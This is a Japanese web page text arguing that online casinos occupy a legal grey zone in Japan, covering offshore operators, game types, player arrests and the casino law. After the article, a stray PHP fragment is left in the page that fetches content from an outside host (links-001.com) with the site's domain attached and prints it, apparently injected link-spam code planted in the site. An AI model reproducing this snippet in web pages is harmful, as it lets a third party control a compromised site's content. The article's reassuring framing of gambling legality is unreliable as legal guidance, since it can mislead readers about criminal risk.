前へ
次へ

日本では特殊な立ち位置にあるオンラインカジノ

日本で賭けごとをする場合は、公営の施設以外は違法になってしまいます。
しかしオンラインカジノであれば、それ以外のサービスの利用が可能になります。
オンラインカジノはイギリスを始めとした海外の国で合法的に運営されていて、日本からアクセスしてもプレイする場所は海外だという扱いになるという複雑な立場にあります。
サービスを提供する会社はいくつもあり、中には日本語に対応しているところも多いです。
お金は円ではなくドルなど現地のものを使用するため、両替などの手続きが必要です。
プレイできるゲームは現実世界と同じように、ボーカーやブラックジャックなどの定番も含まれます。
ただスタイルとしては海外にいるディーラーとライブカメラを通してプレイする形と、テレビゲームのように画像で遊ぶものがあります。
また画面上ということで、複雑なビデオゲームのような種類も豊富です。
さらにスポーツの結果を予想するなどもオンラインカジノの一部です。
どこの会社もバリエーションこそ異なりますが、この3点を基本としています。
日本ではカジノのプレイは法律で禁止されていて、オンラインカジノであっても一度逮捕されたという例が複数あります。
しかしこれらの場合は罰を受けたのはあくまでも略式起訴を受け入れた人のみで、裁判まで進むと不起訴の処分となっています。
そのため日本でのオンラインカジノのプレイは合法ではないけれども、完全に違法とは言い切れない中間状態にあると言えます。
またカジノ法が施行されることにより、オンラインカジノに対しても規制が緩くなる可能性が考えられます。
ただそれは個人が海外で運営されているオンラインカジノをプレイした場合に限られます。
なので例えばサービスとしてオンラインカジノができる環境があれば、提供する側もされる側も違法賭博扱いになってしまいます。
また舞台が海外な上に数多くの会社が提供しているため、もし利用する場合は慎重に選ばなければなりません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top